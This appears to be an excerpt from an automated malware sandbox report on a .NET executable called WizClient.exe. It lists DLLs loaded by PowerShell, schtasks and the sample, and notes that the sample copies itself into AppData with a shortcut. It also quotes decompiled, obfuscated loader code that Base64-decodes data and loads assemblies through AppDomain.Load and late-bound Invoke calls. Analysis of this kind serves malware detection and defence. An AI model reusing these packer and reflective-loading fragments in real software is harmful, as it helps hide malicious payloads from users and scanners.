            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\WizClient.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\WizClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
            Source: WizClient.lnk.3.drLNK file: ..\..\..\..\..\..\Local\WizClient.exe
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\WizClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: WizClient.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: WizClient.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: WizClient.exe, Ek86NJ4u0lYNcFFfGPaK8N7q4H.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{RbAyA3NkD73ndjqtSc3P2WGRUy4z3JhkJuFsryUZXwwnhEEVivpZEtp0sNa6yGwI8IIDaFDXb8QQoc2GSnKL.Coad1DPY7sC43KcTvVUnAO2DgTLNFv466qKrBHXC91eN9FaVUn2WoCKrZLKhclxSmjDguh5VL2r2RHyqglIa,RbAyA3NkD73ndjqtSc3P2WGRUy4z3JhkJuFsryUZXwwnhEEVivpZEtp0sNa6yGwI8IIDaFDXb8QQoc2GSnKL.L2I7pzHjRmoBi4cye3gJurmEISx4QfhquyCws2IOL2hg4h11WpeiwPch5bh0gtrdVDlR2KD32o5kaCgZm6m2,RbAyA3NkD73ndjqtSc3P2WGRUy4z3JhkJuFsryUZXwwnhEEVivpZEtp0sNa6yGwI8IIDaFDXb8QQoc2GSnKL.Wvvy1iYMneGe9YwQ784MfLZ4bxZCi2EU0gmKZK4bBPwplkz55RtAZHWy0x5j5XucR4erAve6p4IEp8QG0XeU,RbAyA3NkD73ndjqtSc3P2WGRUy4z3JhkJuFsryUZXwwnhEEVivpZEtp0sNa6yGwI8IIDaFDXb8QQoc2GSnKL.MjTFhsuWA4H4N5aXgTdwIC3PL0Y4JtKKnyctsnDwtrZdBhvr8akxbu6PLaMEQwwB2b3q0zca6KtDSIyC4Vu5,SWnjqHSOHIHFr4WnpEsMxJbTMM3nl233qOGFtEUGrNNAcbuz7qZJv25QLZ.E8wnMQHnQIkZsPr01twEFbqglnlPeggTA2VQNUZd8z2fkqKzxa07NembiK()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: WizClient.exe, Ek86NJ4u0lYNcFFfGPaK8N7q4H.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{geWIIr7x7GJsduXCoae9cccbwJ[2],SWnjqHSOHIHFr4WnpEsMxJbTMM3nl233qOGFtEUGrNNAcbuz7qZJv25QLZ.s4ks59xP6h8SUYQivT(Convert.FromBase64String(geWIIr7x7GJsduXCoae9cccbwJ[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: WizClient.exe, Ek86NJ4u0lYNcFFfGPaK8N7q4H.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { geWIIr7x7GJsduXCoae9cccbwJ[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            Source: WizClient.exe.3.dr, Ek86NJ4u0lYNcFFfGPaK8N7q4H.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{RbAyA3NkD73ndjqtSc3P2WGRUy4z3JhkJuFsryUZXwwnhEEVivpZEtp0sNa6yGwI8IIDaFDXb8QQoc2GSnKL.Coad1DPY7sC43KcTvVUnAO2DgTLNFv466qKrBHXC91eN9FaVUn2WoCKrZLKhclxSmjDguh5VL2r2RHyqglIa,RbAyA3NkD73ndjqtSc3P2WGRUy4z3JhkJuFsryUZXwwnhEEVivpZEtp0sNa6yGwI8IIDaFDXb8QQoc2GSnKL.L2I7pzHjRmoBi4cye3gJurmEISx4QfhquyCws2IOL2hg4h11WpeiwPch5bh0gtrdVDlR2KD32o5kaCgZm6m2,RbAyA3NkD73ndjqtSc3P2WGRUy4z3JhkJuFsryUZXwwnhEEVivpZEtp0sNa6yGwI8IIDaFDXb8QQoc2GSnKL.Wvvy1iYMneGe9YwQ784MfLZ4bxZCi2EU0gmKZK4bBPwplkz55RtAZHWy0x5j5XucR4erAve6p4IEp8QG0XeU,RbAyA3NkD73ndjqtSc3P2WGRUy4z3JhkJuFsryUZXwwnhEEVivpZEtp0sNa6yGwI8IIDaFDXb8QQoc2GSnKL.MjTFhsuWA4H4N5aXgTdwIC3PL0Y4JtKKnyctsnDwtrZdBhvr8akxbu6PLaMEQwwB2b3q0zca6KtDSIyC4Vu5,SWnjqHSOHIHFr4WnpEsMxJbTMM3nl233qOGFtEUGrNNAcbuz7qZJv25QLZ.E8wnMQHnQIkZsPr01twEFbqglnlPeggTA2VQNUZd8z2fkqKzxa07NembiK()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: WizClient.exe.3.dr, Ek86NJ4u0lYNcFFfGPaK8N7q4H.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{geWIIr7x7GJsduXCoae9cccbwJ[2],SWnjqHSOHIHFr4WnpEsMxJbTMM3nl233qOGFtEUGrNNAcbuz7qZJv25QLZ.s4ks59xP6h8SUYQivT(Convert.FromBase64String(geWIIr7x7GJsduXCoae9cccbwJ[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: WizClient.exe.3.dr, Ek86NJ4u0lYNcFFfGPaK8N7q4H.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { geWIIr7x7GJsduXCoae9cccbwJ[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            .NET source code contains potential unpacker
            Source: WizClient.exe, Ek86NJ4u0lYNcFFfGPaK8N7q4H.cs.Net Code: k6zBEkqlcFwI5qkVNlGQVybSfc System.AppDomain.Load(byte[])
            Source: WizClient.exe, Ek86NJ4u0lYNcFFfGPaK8N7q4H.cs.Net Code: _5feqF394duQ7VNUjCTZzXl8ROf System.AppDomain.Load(byte[])
            Source: WizClient.exe, Ek86NJ4u0lYNcFFfGPaK8N7q4H.cs.Net Code: _5feqF394duQ7VNUjCTZzXl8ROf
            Source: WizClient.exe, SWnjqHSOHIHFr4WnpEsMxJbTMM3nl233qOGFtEUGrNNAcbuz7qZJv25QLZ.cs.Net Code: _0xlIpOSayh3mc1XcyEZAya6n2A4KI7ELXvVMEuPB4fIWMTIWRUuzuQAxyZ System.AppDomain.Load(byte[])
            Source: WizClient.exe.3.dr, Ek86NJ4u0lYNcFFfGPaK8N7q4H.cs.Net Code: k6zBEkqlcFwI5qkVNlGQVybSfc System.AppDomain.Load(byte[])
            Source: WizClient.exe.3.dr, Ek86NJ4u0lYNcFFfGPaK8N7q4H.cs.Net Code: _5feqF394duQ7VNUjCTZzXl8ROf System.AppDomain.Load(byte[])
            Source: WizClient.exe.3.dr, Ek86NJ4u0lYNcFFfGPaK8N7q4H.cs.Net Code: _5feqF394duQ7VNUjCTZzXl8ROf
            Source: WizClient.exe.3.dr, SWnjqHSOHIHFr4WnpEsMxJbTMM3nl233qOGFtEUGrNNAcbuz7qZJv25QLZ.cs.Net Code: _0xlIpOSayh3mc1XcyEZAya6n2A4KI7ELXvVMEuPB4fIWMTIWRUuzuQAxyZ System.AppDomain.Load(byte[])
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C677F1 push ss; retf 3_2_00007FF7C7C67C11
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C681B1 push ss; retf 3_2_00007FF7C7C68452
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C685A1 push ss; retf 3_2_00007FF7C7C6898D
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C6D0F5 push ss; retf 3_2_00007FF7C7C6D14E
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C648DE push ss; retf 3_2_00007FF7C7C6491E
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C6A10A push ss; retf 3_2_00007FF7C7C6A30A
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C6A0AC push ss; retf 3_2_00007FF7C7C6A107
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C640D1 push es; iretd 3_2_00007FF7C7C640D2
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C600BD pushad ; iretd 3_2_00007FF7C7C600C1
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C66BA9 push ss; retf 3_2_00007FF7C7C66D03
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C67776 push ss; retf 3_2_00007FF7C7C677EE
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C66B2D push ss; retf 3_2_00007FF7C7C66BA6
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C672F1 push ss; retf 3_2_00007FF7C7C6766E
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C67279 push ss; retf 3_2_00007FF7C7C672EE
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C64234 push ds; iretd 3_2_00007FF7C7C64252
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C655F0 push ss; retf 3_2_00007FF7C7C657BC
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C67DB1 push ss; retf 3_2_00007FF7C7C68069
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C645C1 push ss; retf 3_2_00007FF7C7C64800
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C64576 push ss; retf 3_2_00007FF7C7C645BE
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C65590 push ss; retf 3_2_00007FF7C7C655ED
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C68136 push ss; retf 3_2_00007FF7C7C681AE
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C68522 push ss; retf 3_2_00007FF7C7C6859E
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C64921 push ss; retf 3_2_00007FF7C7C64B5B
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C67D4E push ss; retf 3_2_00007FF7C7C67DAE
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C64154 push cs; iretd 3_2_00007FF7C7C64162
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C6D151 push ss; retf 3_2_00007FF7C7C6D376
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF7C7B5D2A5 pushad ; iretd 5_2_00007FF7C7B5D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF7C7C700BD pushad ; iretd 5_2_00007FF7C7C700C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF7C7C7347F push esp; iretd 5_2_00007FF7C7C73482
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF7C7D42316 push 8B485F93h; iretd 5_2_00007FF7C7D4231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7C7B4D2A5 pushad ; iretd 8_2_00007FF7C7B4D2A6
            Source: WizClient.exe, v7jmoq7vyUxZj5GLQy.csHigh entropy of concatenated method names: 'MmN0FmIMtYVN05xE2a2SI67X1LdRxn5qq1o6hZg0hgXpSoEjdWYYWQwtZpqkCFqgwbCxJ1bAMoEn8PsUEiaQyrqHHIpP6u', 'D5K6QtBL7YX9j8shjpNrHmbWvMOKI1NKnrv3LLToieJOvNxFhjwLcOsIcSVhba6R7egStPTa9qy40EoPWslq0nKG9dQ4Ew', 'GNt2IYYItY71MbKVk2ax9yU73SbXgV3Pg4ODuKnAiOUSJh0wNqnv4JdqwxP3lnl7YcIOnD40DmVpbi9NyiO9qNn3OQ59D7', 'vASQ2KBbLD9j7', 'SSLVFt0SvFjzU', 'bLFRoghNK3VkU', '_9GdeX3Y7PCodh', 'EmymVY5mhqQyr', 'DZL8tCEh9u9j7', 'JrTWlESzBiMTG'
            Source: WizClient.exe, QjvPgD1dYTpr14dXdxXBUx62yNnbbzHCXcLPM1IKX99KlR0DtfEprtJFnenFcJrWOO7vOQRiyvPOjOBtTItR.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'IYLg9Au3YgMeJL6Nb8PWW', 'mZ32kzeW50ooku7JRDXtE', 'ScDS9bYAjIa5v3gXUIx4U', '_7WlYQFxDwJVDMnMr0nQbM'
            Source: WizClient.exe, qOlbqtOy3nZsg049IR9xh9XXfTtsI69WcgczyQuOaYa9BTHpYkbGuudjcn.csHigh entropy of concatenated method names: 'HOuEa3Zvj1bkpXohST39J5fUpTGELwiH1w9ETx0MHtMD1dM738PGIQ4gPq', 'AunpeS6JAWa5d3UXyC9Oeuny3RnP8XtqTKhBiYXGRJhtQLOalfC2s8H6Ov', 'U2tyQESLw9mPfb4kfGr63OtVHkXQBtoyssfO7mqifg3PDWRLFLnf0JWRT9', 'j3lCJ4fW13qxuAeSdtwBeoa8j9mXdchzVhTS7X5LLXcREcQs9TaJOpHYfv', 'hpzGed2WF0bp5wkb53XoytNT4BzOR8VgDu4Rr1x47qifaJyXXlD3SYYHmCLl6wvAzIQg2cc', 'DoWPuwYC5HplI0bQlXwbinY0honWSMWdFZPymWhj9a3z10ygkW2asVai2wjVXL5Iu1nTDcU', '_3fimPMffWtclg46LH0mYTJRunZJ4C26sm4Duo7StywgtSvL47MFdVPRBKq3M0jO7BfoEIi6', 'XUhpihiWkbyxcyE8iQizrHqZ06aa6uOkgh0jL8WEroRlNPk0wpGmcFX3Rh0LQq0uapOWCEh', 'ee4SevjyWpRtlJDYFZthMDHsdDlVkFeRfLFdlrJKaBCLgwZoUaGmbpqKlcmDrLq3JpQx7P7', 'm8pZwWnmeWQKM8QhlprkEfxKa1tZqPL7RLoUy8h3kfhUPgKoMoxuFEe6q61NjiN9Tl4HPcd'
            Source: WizClient.exe, Ek86NJ4u0lYNcFFfGPaK8N7q4H.csHigh entropy of concatenated method names: 'kwOYrNRJ3t54pzdK0wDsTyjfZr', 'k6zBEkqlcFwI5qkVNlGQVybSfc', '_967p4QzWzl4sjKjVI6LP6JovKz', '_38yWIY4pjOhGkxnUFgkKDH2wqc', 'CeP4lJb4SLZay5YCFNbHphU6zz', 'lMj2dWg45B9x6dHekDnMeE4JBJ', 'nbVDNLODmndVuHchyj3jaJb5ZS', 'zq00kEvWqPjL2yQgQ7NsTefceq', '_9LFmKwmtzNt6KW1TJCG3h72Pmv', '_2InWy99wCgxUKpSsqrYM7QR7Bb'
            Source: WizClient.exe, 0P7cX6mhUWvCKl1xVWC4KX2tdlAwsSBqffiDvrTAddY5PeYXwvnz1VdzUzzPuY88ZQ1SDktdlp2v1KbkO4wA.csHigh entropy of concatenated method names: 'ZdE9TnILk7UK8Ctn1X9xIloiW3fzpsIplUvT2WEzLppgsA5zkMvq2n6twfljtG6Uq78eevWWlXDzWdU45xJL', 'tLC86auKj0WQzGntU9j93omchx1HSt3sOsqPUt9IN5dWTyjqc1gQilcYyFqwcUokKo3LXV8GgA06VXXnKVYO', 'uLApGWAUlqqkirAJ6FbGrcWPl5Hm7fAyOEwkBKVIPlXIosI9oJ0zk9II1AAgewtJKeVCDct6paVnhQkivGKU', '_526E1qBqFfCe0HOml1ZXhkBeRQJwpat0gzaDIDcWQbk9WzcrpqygzP7NcRJUebbZZoCBa8u7sDMBmO4J7ltn', 'H73t7bcMbKelzqH9DHxcxxaTr8', '_2c5SQaPBj6jsR3k1gQZS1wZkx0', 'VsHwyy5CymRiBG0EHkd4X', 'cdPFcBTrnStZZIXmXOZEk', 'J63UVNlhwtAHe1zbkVQh6', '_2o5j3O6uRLVayWVcchPgc'
            Source: WizClient.exe, MNnxWzFHJ2Ct5plUS0TNIf6CaXhblonCfU6C8N8NjeADq3IH21Ggp5wQZS.csHigh entropy of concatenated method names: 'P52Oul3OvEUaTGWtu7esVhC4nFKBzTJgtgWWYCGOXrrdvfAve4HpdUfmnA', 'JsKdkvtGmfBzMs4W2Kct4KN63xJfoyDOlpLoKhdXd1R7XQi5QkFGObCUQL33BRgzNRzLIF9', '_699wu3u0UTRUiEqp6y47oIBIa1VzwpHSkTIfL0Q07kjEQAb4Yh8cdtV3x0sqw5iK7KgOTfo', 'dchtpDAHa96lz91p0DFKqv2sCKM69ttmyrJMafceOAvT97btRovWIsllTexOeNUndDwRGK6', 'XXiTN4ZGSvZH550XttE2YGCCfXw8eGwpL1ymQxRvWN5JHpN9mZAaUI7ruhkHWFnyewe3vNh'
            Source: WizClient.exe, LmsEL10c0LQ0GfKv8vXLMbVMAS.csHigh entropy of concatenated method names: 'BsuajXCmmq73QtMRZgxz6iLzLW', 'q4hMCmCkhkejDGnxNXAJiFrQVV', 'Iy0PglG8N90fmPknsvMjR2o4Oq', '_7LhFRYfL6Vdw6IjgT058kw9T98', 'uozjmRxdiUarqB46zF5JNMzlFC', 'HBm9tCahLIjtkawviQxzYCNG3HODqyt9DJWXfQK1WCwgiVlhXNprxXxHgA', 'n4VhXOhRSBX94AGqZAMcl1JiUwJjDQLEXdATvl1QqkDw9mR1aWUoJZDG3w', 'clxHfQspzu095U3JiL4nelLH7QgvjonqUqUr28Q5HfANUnUT6ppXMDhIou', 'UJhsB9LByePKWUXSnUHOIs4axTdfr0beJZzOhFjJfNQxuzhXSOYOMYVKnv', 'sxe9wv47f9yWp6ZpoKSt2qo7Dte0FArsKcErFtsj0rduqjtTLuc6suSUn0'
            Source: WizClient.exe, SWnjqHSOHIHFr4WnpEsMxJbTMM3nl233qOGFtEUGrNNAcbuz7qZJv25QLZ.csHigh entropy of concatenated method names: '_6h8Z4ist3loJG9DkEkvXiJ5y14rQDEKhLtqiHcH0KsY4vWf8QPXip4W6xs', 'NgDjqwloMfLXHy24Pvvrxk5BtSt8rwUdoLmtowCJZwo7adV23Psv9Gw2iW', 'coLP3NtnRnckEUoqrE9wTMfWC53TLLTHtSmBvH8jEUzinPdU2ePrEEU4Ot', 'MJxVb273xXPrzvyWNqriWohVB46XQ1lCg7MJFaC4meIit4WrYYuABqUcuP', 'D7AJUPhuHrjMr6mheZlIA8xip09HhxvsnkDvd2Cy0YiQ06fyxVslFucJOQ', 'rpFCk9LIWYjgDlz5LQeNvwGlwgnFaxhRPyMcNNOteakUJB9GFXb9Bnhc5P', 'Ps6Wx0i9xfH8ZPBoLzukJY9hRmVVvMKQYt8x0w4yOgHOg2e2NIqOc5Av4c', 'vpRGMI7L36biZK4ls07oB8TtHseipkPD2qpOId8oiQyZPwduyAf8y9aZ9i', '_0saOAClBBCrUBZqS0rQqAXoDAt0AACsMSeRzLKkuc3MHMFfb6TUsESUdgC', 'UtPBnGBAluLu0XsTlVry8F99bn1DNqU3RMccXBkrFU8aUQQKCxL2U1GSwb'
            Source: WizClient.exe, aiCsB5NUHwfKY0UEXSFHtMA6LD.csHigh entropy of concatenated method names: 'A0tuI0bLer3YTx1jA6EEESfGTa', 'cqXrlIY5WB7vZd1mZr48EJ8tkWxeP915IVjaFlkNRA3EJE7DvqV0Pl5tgFFa0jGhRZttvLsMVbvEB0KtxBtHaD', 'XYrNc729kyWU1r27HKZsE1MuwH6zaiVIQ7RKXAxfMyaoMvB0qKTMh1rHfJcT21PIDQ9kR6tqArXoJL9zPoU1Z3', 'DSli6v94EtYJCwVNnMmAuo2uR1Y3DahwSOgR3oemlUDY0nppG2OIigsKncXAzukOeQYytzX72xa7zMyoSPe1Uz', '_3ZtZir52XfXobJO0MDmwdRmuHt1IIrliyf3GdQXrHmOoeDX7CifdEt2RIjuyHTd4OxCvQi1hErWEFRWnyJBmlV'
            Source: WizClient.exe, shmYJX63MoDoDf0kg7JYt6GmNt.csHigh entropy of concatenated method names: '_7LdIpktSdxVScKmQazIPcc9yZD', '_8l8X6QalFJY7Q2AWjHkgqebmhV', '_8G1rMDOqFEvCny1AafZz38l9Uq', 'lziHXKhxa6RF21QVoeUbyRSyPw', '_1S0umYTw98MYOI8wmuriFSrVbD', 'KqNsuo7CAmtxPKItURTsyO0s0Y', '_59DE5ZeRaSNInNOKz7JRVhoDUB', 'PC97umrvLy9wTTb1tQW0IzW8nK', 'TIPRZU6wqjGuKMDhXLxlXYLWnb', 'yuTxu678GPrCbenOoi3eoivM7y'
            Source: WizClient.exe.3.dr, v7jmoq7vyUxZj5GLQy.csHigh entropy of concatenated method names: 'MmN0FmIMtYVN05xE2a2SI67X1LdRxn5qq1o6hZg0hgXpSoEjdWYYWQwtZpqkCFqgwbCxJ1bAMoEn8PsUEiaQyrqHHIpP6u', 'D5K6QtBL7YX9j8shjpNrHmbWvMOKI1NKnrv3LLToieJOvNxFhjwLcOsIcSVhba6R7egStPTa9qy40EoPWslq0nKG9dQ4Ew', 'GNt2IYYItY71MbKVk2ax9yU73SbXgV3Pg4ODuKnAiOUSJh0wNqnv4JdqwxP3lnl7YcIOnD40DmVpbi9NyiO9qNn3OQ59D7', 'vASQ2KBbLD9j7', 'SSLVFt0SvFjzU', 'bLFRoghNK3VkU', '_9GdeX3Y7PCodh', 'EmymVY5mhqQyr', 'DZL8tCEh9u9j7', 'JrTWlESzBiMTG'
            Source: WizClient.exe.3.dr, QjvPgD1dYTpr14dXdxXBUx62yNnbbzHCXcLPM1IKX99KlR0DtfEprtJFnenFcJrWOO7vOQRiyvPOjOBtTItR.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'IYLg9Au3YgMeJL6Nb8PWW', 'mZ32kzeW50ooku7JRDXtE', 'ScDS9bYAjIa5v3gXUIx4U', '_7WlYQFxDwJVDMnMr0nQbM'
